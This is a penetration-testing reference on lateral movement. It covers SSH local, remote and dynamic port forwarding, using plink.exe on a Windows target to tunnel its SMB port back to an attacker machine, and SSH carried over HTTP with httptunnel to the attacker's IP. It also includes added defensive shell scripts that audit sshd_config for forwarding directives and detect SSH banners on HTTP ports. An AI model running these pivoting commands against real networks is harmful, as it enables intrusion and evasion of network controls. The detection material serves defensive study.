Lateral movement
Pivoting / lateral movement / port forwarding / tunneling

Local port forwarding

Forward local port to remote host
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

Remote port forwarding

Forward remote port to local host
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Windows: forward the target's local port 445 to port 444 on our attacking machine. First start the SSH service on the attacking machine:
service ssh start
Download plink.exe to the target and run it (x.x.x.x is our attacking machine):
plink.exe -l root x.x.x.x -R 444:127.0.0.1:445

Dynamic port forwarding

The -D flag makes SSH act as a SOCKS (4/5) proxy server: applications configured to use the proxy send their traffic through the SSH tunnel, and the remote server connects onward on their behalf. Unlike local port forwarding, which maps one local port to one fixed destination, dynamic port forwarding can handle connections to multiple hosts and ports through a single listener.
ssh -D <local proxy port> -p <remote port> <target>
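All three forwarding modes above (-L, -R and -D) depend on the sshd_config of the host being used as the gateway. The following is an added example, not part of the original page: a small POSIX shell audit that reports the server-side directives (AllowTcpForwarding, GatewayPorts, PermitTunnel) whose effective value still permits a logged-in client to pivot. The three configuration files are constructed samples written to temporary files, and the function names are this example's own.

```shell
#!/bin/sh
# Added example (not part of the original page): audit an sshd_config for the
# server-side directives that allow a logged-in client to pivot with -L, -R
# and -D. All three config files below are constructed samples.

WEAK_CONF=$(mktemp)
HARDENED_CONF=$(mktemp)
MATCH_CONF=$(mktemp)
trap 'rm -f "$WEAK_CONF" "$HARDENED_CONF" "$MATCH_CONF"' EXIT

# Constructed: a permissive server. OpenSSH's default for AllowTcpForwarding is
# already "yes", so -L/-R/-D work even when the line is absent.
cat > "$WEAK_CONF" <<'EOF'
Port 22
AllowTcpForwarding yes
GatewayPorts yes
PermitTunnel yes
EOF

# Constructed: forwarding switched off globally.
cat > "$HARDENED_CONF" <<'EOF'
Port 22
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
EOF

# Constructed: a common mistake. The restriction sits inside a Match block, so
# it applies only to user "backup"; every other user keeps the permissive default.
cat > "$MATCH_CONF" <<'EOF'
Port 22
Match User backup
    AllowTcpForwarding no
EOF

# effective_value FILE DIRECTIVE DEFAULT
# Print the global value of DIRECTIVE: sshd honours the first occurrence, and
# everything after the first Match line is conditional, so parsing stops there.
effective_value() {
    ev_val=$(awk -v d="$2" '
        tolower($1) == "match"    { exit }
        tolower($1) == tolower(d) { print tolower($2); exit }
    ' "$1")
    printf '%s\n' "${ev_val:-$3}"
}

# forwarding_findings FILE
# One line per directive whose effective value still permits pivoting.
# Format of each entry: directive:openssh-default:what it permits
forwarding_findings() {
    for entry in \
        "AllowTcpForwarding:yes:-L/-R/-D TCP forwarding" \
        "GatewayPorts:no:-R listeners bound to all interfaces, not only loopback" \
        "PermitTunnel:no:layer-2/3 tun device tunnelling"; do
        ff_directive=${entry%%:*}
        ff_rest=${entry#*:}
        ff_default=${ff_rest%%:*}
        ff_desc=${ff_rest#*:}
        ff_value=$(effective_value "$1" "$ff_directive" "$ff_default")
        if [ "$ff_value" != "no" ]; then
            echo "$ff_directive=$ff_value permits $ff_desc"
        fi
    done
}

# risk_count FILE: number of findings, usable from scripts and tests.
risk_count() {
    forwarding_findings "$1" | wc -l | tr -d ' '
}

for conf in "$WEAK_CONF" "$HARDENED_CONF" "$MATCH_CONF"; do
    echo "== $conf: $(risk_count "$conf") forwarding-related finding(s)"
    forwarding_findings "$conf"
done
```

Run it against a real file with `forwarding_findings /etc/ssh/sshd_config`. The Match-block sample is the case worth remembering: `AllowTcpForwarding no` inside `Match User backup` leaves every other account able to tunnel, because the global default is still `yes`.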

Traffic encapsulation

SSH over HTTP

Using httptunnel
httptunnel only works with TCP services.
At target: listen on port 80 and forward incoming connections from port 80 to local port 22 (the SSH service):
hts -F localhost:22 x.x.x.x:80
Where x.x.x.x is the attacker's LAN or public IP.
At client: start a tunnel on an arbitrary local port (6969 here) that is bound to x.x.x.x:80:
htc.exe -F 6969 x.x.x.x:80
At client: log in via SSH:
ssh -p 6969 localhost
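httptunnel changes the port, not the protocol: the first bytes exchanged on the tunnelled connection are still the SSH identification string ("SSH-2.0-..."), never an HTTP request or response line. The following is an added example, not part of the original page or of httptunnel: a POSIX shell filter that classifies a flow from the first line of its payload and flags SSH banners seen on HTTP ports. The flow records and the function names are constructed for this example, not real captures.

```shell
#!/bin/sh
# Added example (not part of the original page): spot SSH carried over an HTTP
# port. Records are constructed as "server_port first_payload_line"; they are
# not real captures.

# classify_payload FIRST_LINE: print "ssh", "http" or "other" from the first
# line of a TCP stream, independent of the port it was observed on.
classify_payload() {
    case $1 in
        SSH-2.0-*|SSH-1.99-*)                              echo ssh ;;
        HTTP/1.[01]\ *|GET\ *|POST\ *|HEAD\ *|CONNECT\ *)  echo http ;;
        *)                                                 echo other ;;
    esac
}

# ssh_on_http_ports: read "server_port first_payload_line" records from stdin
# and print one line per flow where an HTTP port carries an SSH banner.
ssh_on_http_ports() {
    while read -r port payload; do
        case $port in
            80|443|8080|8443)
                if [ "$(classify_payload "$payload")" = ssh ]; then
                    echo "port $port: SSH identification string '$payload'"
                fi
                ;;
        esac
    done
}

# Constructed sample: a normal HTTP request, an httptunnel-style SSH flow on
# port 80, an ordinary SSH session on port 22 (must not be flagged) and an
# HTTP response on 8080.
SAMPLE_FLOWS='80 GET / HTTP/1.1
80 SSH-2.0-OpenSSH_9.6
22 SSH-2.0-OpenSSH_9.6
8080 HTTP/1.1 200 OK'

# count_flagged: number of flagged flows in the constructed sample.
count_flagged() {
    printf '%s\n' "$SAMPLE_FLOWS" | ssh_on_http_ports | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_FLOWS" | ssh_on_http_ports
```

The rule is deliberately port-agnostic: the banner decides the protocol, the port only decides whether the combination is unexpected, which is what a protocol/port-mismatch detection in a network sensor boils down to.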